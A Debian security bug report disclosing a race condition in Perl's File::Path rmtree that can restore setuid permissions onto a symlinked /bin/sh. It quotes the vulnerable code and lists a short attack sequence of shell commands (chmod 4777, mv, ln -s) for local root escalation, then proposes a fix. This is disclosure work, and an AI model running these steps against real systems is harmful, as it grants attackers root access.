perl-modules: File::Path::rmtree makes setuid

Package: perl-modules
Version: 5.6.1-8.7
Severity: critical
File: /usr/share/perl/5.6.1/File/Path.pm
Tags: security
Justification: root security hole

Noting USN-44-1 e.g. in

  http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0385.html

I looked in perl-N.N.N/lib/File/Path.pm and noticed that rmtree contains
a race condition, allowing creation of setuid files:

   170          (undef, undef, my $rp) = lstat $root or next;
   171          $rp &= 07777;   # don't forget setuid, setgid, sticky bits
   172          if ( -d _ ) {
   ...
   209              if (rmdir $root) {
   210                  ++$count;
   211              }
   212              else {
   213                  carp "Can't remove directory $root: $!";
   214                  chmod($rp, ($Is_VMS ? VMS::Filespec::fileify($root) : $root))
   215                      or carp("and can't restore permissions to "
   216                              . sprintf("0%o",$rp) . "/n");
   217              }
   218          }
   ...

Example of attack: suppose we know that root uses rmtree to clean up
/tmp directories. Attacker prepares things:

  mkdir -p /tmp/psz/sh
  perl -e 'open F, ">/tmp/psz/sh/$_" foreach (1..1000)'
  chmod 4777 /tmp/psz/sh

While root is busy working on /tmp/psz/sh (and this can be made as slow
as we like), attacker does:

  mv /tmp/psz/sh /tmp/psz/dummy
  ln -s /bin/sh /tmp/psz/sh

Root would have recorded the permissions of /tmp/psz/sh, but would
"restore" it to /bin/sh.

I am not sure if things can almost be fixed (for those architectures
without $force_writeable) by enclosing the chmod($rp,...) line within
if(!safe|$force_writeable){...}. Maybe it should be documented that
rmtree must only be used if you can be sure to have exclusive access to
the tree.

(A few minutes ago I emailed the File::Path authors Tim.Bunce@ig.co.uk
and bailey@newman.upenn.edu; Tim.Bunce bounced.)

Cheers,

Paul Szabo - psz@maths.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia


-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23 13:01:39 EST 2004 i686
Locale: LANG=C, LC_CTYPE=C

Versions of packages perl-modules depends on:
ii  perl                          5.6.1-8.7  Larry Wall's Practical Extraction